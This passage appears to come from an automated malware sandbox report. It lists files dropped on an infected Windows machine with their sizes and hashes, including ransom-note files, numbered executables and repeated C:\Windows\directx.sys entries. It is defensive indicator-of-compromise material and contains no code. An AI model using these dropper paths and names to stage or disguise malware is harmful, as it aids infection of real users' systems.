                                                                                                                                        Filesize

                                                                                                                                        240KB

                                                                                                                                        MD5

                                                                                                                                        7bf2b57f2a205768755c07f238fb32cc

                                                                                                                                        SHA1

                                                                                                                                        45356a9dd616ed7161a3b9192e2f318d0ab5ad10

                                                                                                                                        SHA256

                                                                                                                                        b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25

                                                                                                                                        SHA512

                                                                                                                                        91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\wecker.txt.bat

                                                                                                                                        Filesize

                                                                                                                                        50B

                                                                                                                                        MD5

                                                                                                                                        6a83b03054f53cb002fdca262b76b102

                                                                                                                                        SHA1

                                                                                                                                        1bbafe19ae5bcdd4f3710f13d06332128a5d54f7

                                                                                                                                        SHA256

                                                                                                                                        7952248cb4ec97bc0d2ab3b51c126c7b0704a7f9d42bddf6adcb04b5657c7a4e

                                                                                                                                        SHA512

                                                                                                                                        fa8d907bb187f32de1cfbe1b092982072632456fd429e4dd92f62e482f2ad23e602cf845a2fd655d0e4b8314c1d7a086dc9545d4d82996afbccb364ddc1e9eae

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe

                                                                                                                                        Filesize

                                                                                                                                        15.9MB

                                                                                                                                        MD5

                                                                                                                                        cf2a00cda850b570f0aa6266b9a5463e

                                                                                                                                        SHA1

                                                                                                                                        ab9eb170448c95eccb65bf0665ac9739021200b6

                                                                                                                                        SHA256

                                                                                                                                        c62cb66498344fc2374c0924d813711ff6fa00caea8581ae104c3c03b9233455

                                                                                                                                        SHA512

                                                                                                                                        12d58063ccad16b01aaa5efb82a26c44c0bf58e75d497258da5cc390dcf03c2f06481b7621610305f9f350729ac4351ef432683c0f366cb3b4e24d2ffb6fc2a0

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\TmpE6F5.tmp

                                                                                                                                        Filesize

                                                                                                                                        2KB

                                                                                                                                        MD5

                                                                                                                                        1420d30f964eac2c85b2ccfe968eebce

                                                                                                                                        SHA1

                                                                                                                                        bdf9a6876578a3e38079c4f8cf5d6c79687ad750

                                                                                                                                        SHA256

                                                                                                                                        f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9

                                                                                                                                        SHA512

                                                                                                                                        6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_32loksfj.yhe.ps1

                                                                                                                                        Filesize

                                                                                                                                        60B

                                                                                                                                        MD5

                                                                                                                                        d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                        SHA1

                                                                                                                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                        SHA256

                                                                                                                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                        SHA512

                                                                                                                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-2SOD7.tmp\ska2pwej.aeh.tmp

                                                                                                                                        Filesize

                                                                                                                                        2.5MB

                                                                                                                                        MD5

                                                                                                                                        62e5dbc52010c304c82ada0ac564eff9

                                                                                                                                        SHA1

                                                                                                                                        d911cb02fdaf79e7c35b863699d21ee7a0514116

                                                                                                                                        SHA256

                                                                                                                                        bd54ad7a25594dc823572d9b23a3490ff6b8b1742a75e368d110421ab08909b2

                                                                                                                                        SHA512

                                                                                                                                        b5d863ea38816c18f7778ef12ea4168ceb0dae67704c0d1d4a60b0237ca6e758c1dfc5c28d4fc9679b0159de25e56d5dfff8addacd7a9c52572674d90c424946

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-37KNF.tmp\x2s443bc.cs1.tmp

                                                                                                                                        Filesize

                                                                                                                                        3.0MB

                                                                                                                                        MD5

                                                                                                                                        0d5dc73779288fd019d9102766b0c7de

                                                                                                                                        SHA1

                                                                                                                                        d9f6ea89d4ba4119e92f892541719c8b5108f75f

                                                                                                                                        SHA256

                                                                                                                                        0a3d1d00bfdbded550d21df30275be9bca83fb74ca3b2aabd4b0886a5d7cc289

                                                                                                                                        SHA512

                                                                                                                                        b6b1cf77bcb9a2ad4faa08a33f54b16b09f956fa8a47e27587ad2b791a44dc0bd1b11704c3756104c6717abcaffc8dd9260e827eccd61551b79fcedd5210fe61

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

                                                                                                                                        Filesize

                                                                                                                                        458KB

                                                                                                                                        MD5

                                                                                                                                        619f7135621b50fd1900ff24aade1524

                                                                                                                                        SHA1

                                                                                                                                        6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                        SHA256

                                                                                                                                        344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                        SHA512

                                                                                                                                        2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                      • C:\Users\Admin\AppData\Local\Tempspwak.exe

                                                                                                                                        Filesize

                                                                                                                                        30KB

                                                                                                                                        MD5

                                                                                                                                        d459ac27cda1076af5b93ba8a573b992

                                                                                                                                        SHA1

                                                                                                                                        429406da9817debfbadd91dc7aecb9a682d8d9da

                                                                                                                                        SHA256

                                                                                                                                        c458b39ee9dacfece49933e4ceaaeab376448d8d56eb503ea519a8df8323bccb

                                                                                                                                        SHA512

                                                                                                                                        3f4569a5a21564b6c54df889f58022c88c6c71d415ad9f9203ead1ed518a8886d2c31a0cd7980fa47874dc5ad12c4e2b9c6946d8d643f06583c2f4c77c20500a

                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\_R_E_A_D___T_H_I_S___2U452JHB_.hta

                                                                                                                                        Filesize

                                                                                                                                        75KB

                                                                                                                                        MD5

                                                                                                                                        4b3dc234d2cb31790595efcc550b552c

                                                                                                                                        SHA1

                                                                                                                                        c8cd9c38dfffcafc4887aa787919abfb5b45eca0

                                                                                                                                        SHA256

                                                                                                                                        4499dfee1c73dc0b16f857b3bb31f7743ec99a70bec7b4343ae518fa0960ac51

                                                                                                                                        SHA512

                                                                                                                                        19b0863748b4a98b72d543f691489045111e8523e912679efbd8320a0c24a7b0a5ad59e20f8aae1f4a3a016c63a30ffd3edfd2c5280543c971ee6d062b1ae75a

                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\_R_E_A_D___T_H_I_S___3QQDXUI_.txt

                                                                                                                                        Filesize

                                                                                                                                        1KB

                                                                                                                                        MD5

                                                                                                                                        86ca20349c2f199f55e9f2e0998b673f

                                                                                                                                        SHA1

                                                                                                                                        53701e7d13b5a9251cac422a5230ac0cfe25bdae

                                                                                                                                        SHA256

                                                                                                                                        8bd21d5cd2bce3fb1f224cb0ea62fbfc4ad29a645c60fb536c7cce51c2cb0557

                                                                                                                                        SHA512

                                                                                                                                        f26a6ccb552b3679a049b653b77f8e1e32af604e94519ef7ad43d7199d80e43a0ff25e290067515ac7d4f5516581a60f67ecd12d3df6c86a92b73bad53bcec36

                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                                                                                                        Filesize

                                                                                                                                        358B

                                                                                                                                        MD5

                                                                                                                                        305bd837554d59c22d323f84141f6c44

                                                                                                                                        SHA1

                                                                                                                                        7a89d4dd0c9650ab61ee3993124fde7d039d74ff

                                                                                                                                        SHA256

                                                                                                                                        4de096b2a7548d0ace202de1dea6ba4f9e26af66c1567ec8d41f7e64dd05848e

                                                                                                                                        SHA512

                                                                                                                                        be1604c43729eaf78b04e00989e223d20ac8db834add033c60ebe4debd5b55902bff7c8a289a1b3d242e4d3c8fed35d4d8a7fe71648a3a3815d1a6b0493fc878

                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Speech\Files\UserLexicons\SP_8C91BB1A850246E396F61F5D15C40EB0.dat

                                                                                                                                        Filesize

                                                                                                                                        940B

                                                                                                                                        MD5

                                                                                                                                        6fbf52a4a4d444f856bbee665ee77182

                                                                                                                                        SHA1

                                                                                                                                        37f898d72031d9baa51d5beb99041fa2ba9cc0cb

                                                                                                                                        SHA256

                                                                                                                                        50724eea8aad8a723f44e705d911fc5ecd7a8fa60393ffca25c38a6e2b056a00

                                                                                                                                        SHA512

                                                                                                                                        f220b6476fcd799940fff5e4fc1d183899c9a48897858e87be97f982fd7aefe68bf73fe249f43e444455b27c2449e6e6d64f10c12c1aaa1e2f2440bbdc25e2e5

                                                                                                                                      • C:\Users\Admin\Desktop\1.exe

                                                                                                                                        Filesize

                                                                                                                                        89KB

                                                                                                                                        MD5

                                                                                                                                        69a5fc20b7864e6cf84d0383779877a5

                                                                                                                                        SHA1

                                                                                                                                        6c31649e2dc18a9432b19e52ce7bf2014959be88

                                                                                                                                        SHA256

                                                                                                                                        4fe08cc381f8f4ea6e3d8e34fddf094193ccbbcc1cae7217f0233893b9c566a2

                                                                                                                                        SHA512

                                                                                                                                        f19f3221a26bdab7ddcf18196ef6e6012968c675065c4e56f54faaace18321c07771fdbdacabd365159ccc5bf01e40693146709217e13dcd282609242e61a4bc

                                                                                                                                      • C:\Users\Admin\Desktop\10.exe

                                                                                                                                        Filesize

                                                                                                                                        3.4MB

                                                                                                                                        MD5

                                                                                                                                        2426582fd864c9fdcee8d399544c4b3b

                                                                                                                                        SHA1

                                                                                                                                        234e48e84b0632ec4435e390976bc90732c85d2b

                                                                                                                                        SHA256

                                                                                                                                        59a48522605a543ed90844101504e2719c904af0fe33c056da4d9fa0075365a3

                                                                                                                                        SHA512

                                                                                                                                        a5c34c11c8df93441e272c57338c6a8fe0a1a6725e739347156ca03111bbb9f5e2095f8e04293a87cf8e03177fe67f3378a51b319923305347eec53d94ef4633

                                                                                                                                      • C:\Users\Admin\Desktop\2.doc

                                                                                                                                        Filesize

                                                                                                                                        803KB

                                                                                                                                        MD5

                                                                                                                                        7f6c623196d7e76c205b4fb898ad9be6

                                                                                                                                        SHA1

                                                                                                                                        408bb5b4e8ac34ce3b70ba54e00e9858ced885c0

                                                                                                                                        SHA256

                                                                                                                                        3a5648f7de99c4f87331c36983fc8adcd667743569a19c8dafdd5e8a33de154d

                                                                                                                                        SHA512

                                                                                                                                        8a57b3c14fe3f6c7ea014f867924176d3b9c07ad6195b0e5fa877e16b55b1c23e4abfdf24b7e7a0dffafe8991d4878d98dad1419be03f27f64f0c95720542dee

                                                                                                                                      • C:\Users\Admin\Documents\@[email protected]

                                                                                                                                        Filesize

                                                                                                                                        280KB

                                                                                                                                        MD5

                                                                                                                                        70aeca0900d87e44b1df8ee2b483c13a

                                                                                                                                        SHA1

                                                                                                                                        259905763629d129cc86be371dd09462f8900333

                                                                                                                                        SHA256

                                                                                                                                        a12d6a8c09b0a451a6c334f1f7a7dcd91bb49283f0edabd774033b83658817f2

                                                                                                                                        SHA512

                                                                                                                                        371f2b3d0a679508f5963f12c17d13ed6a70ec79d5aba7a5af31bbaae63a4bde0ce2878cb3acac706a1df1b4885b6ee3159601555a8d7f4d55d4ff54fe0f36cb

                                                                                                                                      • C:\Users\Admin\Documents\OneNote Notebooks\My Notebook\@[email protected]

                                                                                                                                        Filesize

                                                                                                                                        944B

                                                                                                                                        MD5

                                                                                                                                        78439bd025530a2439716f27f93e4b2c

                                                                                                                                        SHA1

                                                                                                                                        4a4bfd479720287972b793370d93ad56b71efd1f

                                                                                                                                        SHA256

                                                                                                                                        507594a2615d2cea6ad500fb14e3361175cdbd80db908ddb045c9c3ab62670a9

                                                                                                                                        SHA512

                                                                                                                                        f503b9ae5384f6afdfa0fad985ee61283a31c1c9146ae5f277f7a87f7e29df25f1d534de80c80c1dbdadde36724360d98fcdc13f65f0b3bea8e778873f894761

                                                                                                                                      • C:\Windows\directx.sys

                                                                                                                                        Filesize

                                                                                                                                        99B

                                                                                                                                        MD5

                                                                                                                                        7e8f647e135a440bfa025ddf05559a64

                                                                                                                                        SHA1

                                                                                                                                        c27a4e125b7cc8f3cada84de9ceadb6174a5b6fb

                                                                                                                                        SHA256

                                                                                                                                        279ff4e7b4c21d6eec1d80288b71ee51373fe258bfebab4b3654e4a3d162163c

                                                                                                                                        SHA512

                                                                                                                                        dae5d2b9c565828ac2f4398ca62a289c061e3e3b80c53533b23cad8aebea2f8f59a8f96f240102ececd2eb5218ad3ff7bb3ccec8e8f4435e3a2f73f3ebacf938

                                                                                                                                      • C:\Windows\directx.sys

                                                                                                                                        Filesize

                                                                                                                                        103B

                                                                                                                                        MD5

                                                                                                                                        3d9e8f531ee8dde7806d06f0143326da

                                                                                                                                        SHA1

                                                                                                                                        97e6bad611a975a6daabf27ef3fd941a3f0f1546

                                                                                                                                        SHA256

                                                                                                                                        bf4f06025a6dc8da22585b8ea89fb4d8c68ad39eb62d74244fdcb78d762f0666

                                                                                                                                        SHA512

                                                                                                                                        9e8395feef1d0293be6089b67d50ef67b5472b9560475a57d95b3415345e8372cd59d2c9098656380c309eeab6fdb853aca54396050719df1b4124c8bf1a5b55

                                                                                                                                      • C:\Windows\directx.sys

                                                                                                                                        Filesize

                                                                                                                                        76B

                                                                                                                                        MD5

                                                                                                                                        033a21d049cf5546fe0537f15435c440

                                                                                                                                        SHA1

                                                                                                                                        2da12b487030fb6300e992b474860444229dfad6

                                                                                                                                        SHA256

                                                                                                                                        bdb8157f9c7d593b90df878e8010f87c3d3f18108e43d2e50415b36c5536f3d1

                                                                                                                                        SHA512

                                                                                                                                        0a60df9963d3b5adb25347d1270163d7257dd0823a4435a7a07a3a0dfdeeef6e9b06d1101f672453b5cdc63bdbc18d4fd43e813fc6220a5c764a276190bcc224

                                                                                                                                      • C:\Windows\directx.sys

                                                                                                                                        Filesize

                                                                                                                                        57B

                                                                                                                                        MD5

                                                                                                                                        cdfbb78a763e6c3face6456fb024f193

                                                                                                                                        SHA1

                                                                                                                                        70a2785fcb5d503476fdaed5f20591882471ea72

                                                                                                                                        SHA256

                                                                                                                                        51646369f60f3b951eb149c9b6fc2d50eef0ec8d64e83572d82eb819d73b8b7b

                                                                                                                                        SHA512

                                                                                                                                        6554ca2582264b959721eb79909109d19dba447337a965e296fd147283b7d75097aeafe5968bce543fb64d03eb01ecca22eb5e812f37688ff151e688bed24773

                                                                                                                                      • C:\Windows\directx.sys

                                                                                                                                        Filesize

                                                                                                                                        60B

                                                                                                                                        MD5

                                                                                                                                        6a86d370b98ffc0bf44cc7fe57f74e66

                                                                                                                                        SHA1

                                                                                                                                        89a58edf8acbc7db7194d275ec4ddfb355748583

                                                                                                                                        SHA256

                                                                                                                                        8611f120c293c8b5cb9d4ba206ef516f5f469c0dcc391eb1b2c0b238b13a94a8

                                                                                                                                        SHA512

                                                                                                                                        0d22d63590a7872f721e812f68e404a4d9416256909948084813af70904a3d87302bb7a37d48c3e705ccadb26a90bfdb622957a5265e8ac1922daf7f37ea3626

                                                                                                                                      • C:\Windows\directx.sys

                                                                                                                                        Filesize

                                                                                                                                        59B

                                                                                                                                        MD5

                                                                                                                                        12a2ea197d225262e1bf25e6f9226476

                                                                                                                                        SHA1

                                                                                                                                        d136a9b310e54108ba98756fdb3200670b15ad4b

                                                                                                                                        SHA256

                                                                                                                                        e34d02686186df06abbbe1e80bfc6bfffb526a5feb1e9888e5c2026ecd7ac46a

                                                                                                                                        SHA512

                                                                                                                                        2ffb52fbef05544d8bdd68875c4b85fc5d5cf49e794774d3bb2dd0607583286c6642308af50de55b6f33e70397ed3f8428c93e05287d5dc3d69ffcf73c58f100

                                                                                                                                      • C:\Windows\directx.sys

                                                                                                                                        Filesize

                                                                                                                                        62B

                                                                                                                                        MD5

                                                                                                                                        a38de742e8cd521b333714b95016a391

                                                                                                                                        SHA1

                                                                                                                                        39a4e2a7f867e66fda00964eda3570831354d3ba

                                                                                                                                        SHA256

                                                                                                                                        bb31a153b04dd5bb1af6bc95a0ad71d7e6d4980a46cbddb3388142d0ccfdea3d

                                                                                                                                        SHA512

                                                                                                                                        7d433eb23144ce159ab2d398070f2b30c5be73a94a06eabc46b2c0b192ae46ee077017541c7b330b2bcc8f8d68b1ed1a8c58d6c43f9b29e15072b342fa542232

                                                                                                                                      • C:\Windows\directx.sys

                                                                                                                                        Filesize

                                                                                                                                        24B

                                                                                                                                        MD5

                                                                                                                                        c93ff55f5c5a9e2323b2f5d677bdbee1

                                                                                                                                        SHA1

                                                                                                                                        3e1c36c7d34bafad15e140ce5b03734f6aa87d1d

                                                                                                                                        SHA256

                                                                                                                                        15a9b8e44230a9fef940f579e061c1db4244d2aae8a68f6139227b034e9f28cc

                                                                                                                                        SHA512

                                                                                                                                        8912432056d997f4847afcebbe0dca43e3d8bc249d539ebf937ab77871d797d6f84ff860fbccec6bffab898bf18edb30ea5805e8ed8c63e05a3272b0e512aa3a

                                                                                                                                      • C:\Windows\directx.sys

                                                                                                                                        Filesize

                                                                                                                                        29B

                                                                                                                                        MD5

                                                                                                                                        8e966011732995cd7680a1caa974fd57

                                                                                                                                        SHA1

                                                                                                                                        2b22d69074bfa790179858cc700a7cbfd01ca557

                                                                                                                                        SHA256

                                                                                                                                        97d597793ec8307b71f3cfb8a6754be45bf4c548914367f4dc9af315c3a93d9b

                                                                                                                                        SHA512

                                                                                                                                        892da55e0f4b3ff983019c11d58809fdcb8695d79c617ddc6251791308ee013bf097d1b4a7541140f7a01c56038a804974a4f154cc1b26e80e5cf5c07adf227c

                                                                                                                                      • C:\Windows\directx.sys

                                                                                                                                        Filesize

                                                                                                                                        58B

                                                                                                                                        MD5

                                                                                                                                        05cec81afc844527d68053190c7cc2f0

                                                                                                                                        SHA1

                                                                                                                                        d6d86d32c36b298b903b5707616eee20afb0eed7

                                                                                                                                        SHA256

                                                                                                                                        197c694298fcb5372d30e630df55e97f2dd663a9e7dab20f659a96f0e8147e7e

                                                                                                                                        SHA512

                                                                                                                                        1a9b3ab6afbabfb0bef7e721bca05a70982450e3f9feec53126c7e0c2f08fd5ce5386d78a2154c53b09cc8879e80e725a21def30944b7da608976b55871882f8

                                                                                                                                      • C:\Windows\directx.sys

                                                                                                                                        Filesize

                                                                                                                                        55B

                                                                                                                                        MD5

                                                                                                                                        2c0cbca4c127b38df1f8f90480e1dd6f

                                                                                                                                        SHA1

                                                                                                                                        e42899c8e2d2edcf46b9ca8a235ec484a089d9d3

                                                                                                                                        SHA256

                                                                                                                                        0c5a61af49c753b812963121df8edb67f038bf25351a47f1fda6caa1c35946b9

                                                                                                                                        SHA512

                                                                                                                                        0de3bdcaf499e583bc28df564d7befa3b7c465f4e3e5457e6ee13b413202dd0892ca2dfc040fa0e07c071a25c1f7216ac9da5bbfb71b2157b814e704ad47b2da

                                                                                                                                      • C:\Windows\directx.sys

                                                                                                                                        Filesize

                                                                                                                                        62B

                                                                                                                                        MD5

                                                                                                                                        65fe2ec20c117b788c337c709aa26621

                                                                                                                                        SHA1

                                                                                                                                        ec180b2b2d46303a376e03474d209e91ae45e60b

                                                                                                                                        SHA256

                                                                                                                                        59991b6e04657d7649af9a0de7374e2a63b1d05e119ac2e780ece8cbd254376e

                                                                                                                                        SHA512

                                                                                                                                        09f328d856a13e2961aa2fb4136892eda940dd68118d9c1b1ab327d84d2014f95bee7ab1f1ac2bbb2231256b3dd18c60bc14b38e4adec5c579410b10edbeff34

                                                                                                                                      • C:\Windows\directx.sys

                                                                                                                                        Filesize

                                                                                                                                        56B

                                                                                                                                        MD5

                                                                                                                                        8366481e86564faef3f22a4ac173fd6b

                                                                                                                                        SHA1

                                                                                                                                        740bd57a168c0a70758c4dae69c679ea667e65ad

                                                                                                                                        SHA256

                                                                                                                                        85b944d6fe66af7f810600db9d95041daadd39676d8eca6b259d6a69163ad293

                                                                                                                                        SHA512

                                                                                                                                        13e470cdadea15a2907d3e009f6b69c71e1a47544c7efca0ab11ce2a11e3ba69f5279d826dbadb7c6ff073f567a057f7693a55f8d0974ee190b085c5c7c270fd

                                                                                                                                      • C:\Windows\directx.sys

                                                                                                                                        Filesize

                                                                                                                                        62B

                                                                                                                                        MD5

                                                                                                                                        714a8f06bcd384212985ab12a717b07d

                                                                                                                                        SHA1

                                                                                                                                        36bdf3245656e60c141ad793369fdc3ffd99e407

                                                                                                                                        SHA256

                                                                                                                                        6fbe1b44d35d78d6588763fe85b3e3586aa63dc55da4cc008563e367f459ed3d

                                                                                                                                        SHA512

                                                                                                                                        1e7ec37282a32e9acb4fa0c8384aee17bbe04757ea854c6f833e7486da2e1ee8e9a14b4f197ba2483c3e313f6c2abc810849af79f221a3a887296a11576c6b73

                                                                                                                                      • C:\Windows\directx.sys

                                                                                                                                        Filesize

                                                                                                                                        57B

                                                                                                                                        MD5

                                                                                                                                        8b6dbdb20a933485f224b31a3a3e42e1

                                                                                                                                        SHA1

                                                                                                                                        dc7def0dd173aea45e38e48bf2aa618d952adf21

                                                                                                                                        SHA256

                                                                                                                                        bcafedda46a837ee98f7d8240f4f814dad16982a3db6d38e649fe6b95925e872

                                                                                                                                        SHA512

                                                                                                                                        a0634db794b8398e6b1294864f7ecc4457a733ebe3be8ca44540fd316bbf87d05f514b9aae31efdf390a67140f7bf7dcc9354091d64c389bd25436e82385b028

                                                                                                                                      • C:\Windows\directx.sys

                                                                                                                                        Filesize

                                                                                                                                        55B

                                                                                                                                        MD5

                                                                                                                                        df3ddb7afdf03b988cf6128b2d5c00fa

                                                                                                                                        SHA1

                                                                                                                                        0b1e51819b95e6b251746e56de240bd9ab948547

                                                                                                                                        SHA256

                                                                                                                                        355c24d13c80209aee14f129d249d15227df465195b410dc081c000d15666675

                                                                                                                                        SHA512

                                                                                                                                        3c9d8ff46107cb951e4d773fdb940b465af804b373d592e21fcf10dc68b7200d1928e716d29e29982a9a7559538ce770ceaf720f4a40b2e16b4a9c3a2b389bcb

                                                                                                                                      • C:\Windows\directx.sys

                                                                                                                                        Filesize

                                                                                                                                        58B

                                                                                                                                        MD5

                                                                                                                                        e9ca90dc018d862d9475d1a28d2c29c7

                                                                                                                                        SHA1

                                                                                                                                        a46f60e0983c7e5e54522f9f619a03262a7b2c83

                                                                                                                                        SHA256

                                                                                                                                        bedc193fd83a4a7b1868e340c021da084d5d8c79fd0e408514a5cd4ce9b112ca

                                                                                                                                        SHA512

                                                                                                                                        c0e44ec9ca1265ba4e40d07e3e65d8de09a6118deda2657d2c33240bb085d2dcec773262035c90fc85cde13641563eb4cc3bb3369acdd9959c0c0cd23f2b36bd

                                                                                                                                      • C:\Windows\directx.sys

                                                                                                                                        Filesize

                                                                                                                                        62B

                                                                                                                                        MD5

                                                                                                                                        1b5a9762c64869165373c3df3e43258f

                                                                                                                                        SHA1

                                                                                                                                        fef91865d5e0967bedb5350547021313d6cec609

                                                                                                                                        SHA256

                                                                                                                                        dad1a0293ca6fc31d017bf8b4903867b4c61fde0f3de2de36b7a055893392b1e

                                                                                                                                        SHA512

                                                                                                                                        138e78ebe4db44c8fe2205bcbba34897020e6808ace2fbf4dddc4a5604bf59b4c25cbc51813389eca6c07efe1011ffb42e25a1f420bfb2b43aa357193b0670f7

                                                                                                                                      • C:\Windows\directx.sys

                                                                                                                                        Filesize

                                                                                                                                        62B

                                                                                                                                        MD5

                                                                                                                                        2603f8cec81b7c1d507718d6d829b19b

                                                                                                                                        SHA1

                                                                                                                                        7e6e381a130dec35ff12c54a1ee6d5afafb788bf

                                                                                                                                        SHA256

                                                                                                                                        d642d18ef2103edd5006a9f2ae612d4be4931055456e464ad5e9e9bb5034debe

                                                                                                                                        SHA512

                                                                                                                                        0f218fadbd0e04d8036aedb4254e83f4b0039b0999fcca199686b2c62ab459df8f83dacac5fb24a7e3649993354c31a839dfae01b0aa6c2080d2b3d6d08e85f0

                                                                                                                                      • C:\Windows\directx.sys

                                                                                                                                        Filesize

                                                                                                                                        61B

                                                                                                                                        MD5

                                                                                                                                        3c988ac43ea240cc6d9db637407f6b43

                                                                                                                                        SHA1

                                                                                                                                        163616f0a832c95f5062136458493dc711001831

                                                                                                                                        SHA256

                                                                                                                                        b09e0ade9c4ad57688a86f4274052452e5db3a92650763cb8cfe6ccf4bf63bf3

                                                                                                                                        SHA512

                                                                                                                                        8f7d19ba1cb90300557611ac5c2600c5049c49f937b765587e8af7f5f1673b3c6df24c2f01dd4151fe8e95183d7bbdf54fe29a9d74143b4391129a550952bafd

                                                                                                                                      • C:\Windows\directx.sys

                                                                                                                                        Filesize

                                                                                                                                        62B

                                                                                                                                        MD5

                                                                                                                                        32fa25f515f717627cc9d05b89dda4d6

                                                                                                                                        SHA1

                                                                                                                                        3cb59f8aa123b4ee48243e19df15315a4ad298c7

                                                                                                                                        SHA256

                                                                                                                                        5adc771b0dc32cb168c7c02d0ba0178094939456381e0ff288a43c46944018c1

                                                                                                                                        SHA512

                                                                                                                                        488eaa6e9d80ea9f8c43b9c9f1fb20d3221e49ab3efbe01576ff551aa1f6b1376cf701907ab0513d5234a0f9265548083b3030db07fdc2e02478b3295576395f

                                                                                                                                      • C:\Windows\directx.sys

                                                                                                                                        Filesize

                                                                                                                                        55B

                                                                                                                                        MD5

                                                                                                                                        d8fb541934cfe5070e4b046d7292d534

                                                                                                                                        SHA1

                                                                                                                                        71cf0425b22e80a6978eb206fdc4a99ab9654f14

                                                                                                                                        SHA256

                                                                                                                                        d01498d0c13f8f1516a88b039678bc9d98b714f411403057dea9c944a5ad2d18

                                                                                                                                        SHA512

                                                                                                                                        515986e930b2a2327370fcad42d84a3388b662020e34c42d82128f17f2bc56d487c78146ac0354ab742d482405660aefe0631436d2d116abc535ae9b07886f13

                                                                                                                                      • C:\Windows\directx.sys

                                                                                                                                        Filesize

                                                                                                                                        62B

                                                                                                                                        MD5

                                                                                                                                        4ef8f8189c54a070484c7edaf1ba752a

                                                                                                                                        SHA1

                                                                                                                                        65fa458881dac8091cd8295f3d85afee7067a9b5

                                                                                                                                        SHA256

                                                                                                                                        e3df374d7172527703dbf69c1f5067d5ff068d538796bfb8143d0bd01fcda1c9

                                                                                                                                        SHA512

                                                                                                                                        fcdfe76815965f38ed2a17e7193b814a353dccf0e87117e846f6c11be44318336fa822898ef8619fd89b8b36dbf1f1a780d1303ffd15b5f7baccefd29baffc02

                                                                                                                                      • C:\Windows\directx.sys

                                                                                                                                        Filesize

                                                                                                                                        29B

                                                                                                                                        MD5

                                                                                                                                        e48dd15c2622de57f9d96167526aa29b

                                                                                                                                        SHA1

                                                                                                                                        227e44c82be64d3b54a0d237018a874ea16c6982

                                                                                                                                        SHA256

                                                                                                                                        b84d90ce79f74578bf032d5481e92435bb92dc5da421f090dacf3184478d0e60

                                                                                                                                        SHA512

                                                                                                                                        371d73f5ebbb28aa7ff462905c6176f35c817dc18bed35d06b6e68022c6887b871fcf655fd0190523ebf3a16818c8df3bb6479fb27aef2175fa0894105ec0aa0

                                                                                                                                      • C:\Windows\directx.sys

                                                                                                                                        Filesize

                                                                                                                                        88B

                                                                                                                                        MD5

                                                                                                                                        0f5d612412d9e517dc0584338b55822d

                                                                                                                                        SHA1

                                                                                                                                        52c32b5c0ce0fa782b9b92fcc743be0222dfc553

                                                                                                                                        SHA256

                                                                                                                                        ef4c1111046ffed2be1134a8ca7d85095439dfff4995d3d556476bd69fa6ab2a

                                                                                                                                        SHA512

                                                                                                                                        e333309195a76e0e1f3833c638e5bcb7ee4e8c2394feb60cb9481fcfe258cbc5f5772f85bd0ffbb67d1e876f0b39afdbfa6c00f3a504f38b93dc34fb14c659f4

                                                                                                                                      • C:\Windows\directx.sys

                                                                                                                                        Filesize

                                                                                                                                        62B

                                                                                                                                        MD5

                                                                                                                                        8ca21f8dd3b7eddf6879c08993533d93

                                                                                                                                        SHA1

                                                                                                                                        4e817648adf0f77e591e6eaf75493962166ffeef

                                                                                                                                        SHA256

                                                                                                                                        cfeef09385cfdd8873b224fde8524844ca549a99f0b8f95156a796171421a546

                                                                                                                                        SHA512

                                                                                                                                        15c591bbe490d641e8c58e6f37fb13b0081617e6f3c36f1cef11b0d211fa3c1c3bbff878ecd4cdc177c6c1d9375e5635c8269b2a9a3a5f00041af4265a0b635b

                                                                                                                                      • C:\Windows\directx.sys

                                                                                                                                        Filesize

                                                                                                                                        62B

                                                                                                                                        MD5

                                                                                                                                        d2ae0507b4ac0e9d5af87a6c4ef4e918

                                                                                                                                        SHA1

                                                                                                                                        909da8a13a26c8a46fba67989f59463fe0c2fa37

                                                                                                                                        SHA256

                                                                                                                                        6a663b00662d6842065d623a52c66a58e61312f05bda6daf6d95e9ce80b3efa3

                                                                                                                                        SHA512

                                                                                                                                        1cc88e89021ef91e7c1b6e1d9d49d0538f83ced34d1383b525cfe29661896f2437e55d09275a2db7d82c94d8a34e237a4aa8152130c07e7f85d4b9c33baa9412

                                                                                                                                      • C:\Windows\directx.sys

                                                                                                                                        Filesize

                                                                                                                                        62B

                                                                                                                                        MD5

                                                                                                                                        22d77d62d38a941d725c621e37dd5c54

                                                                                                                                        SHA1

                                                                                                                                        e592710d9b27995aff95aad52fab04d3ce11e430

                                                                                                                                        SHA256

                                                                                                                                        e65ab34a683fbd46b0e10f821c1c25ecf21242cfdc132d000f0b5a5c766df3f3

                                                                                                                                        SHA512

                                                                                                                                        788ba2c41673712b5d0ab1cf34f2c78c07b641911dfa8faa7ca20dd099e23d81687708fe56a6fc1e6e27182e5041cfca07f6bc6d586ae1709c4594e847128c8b

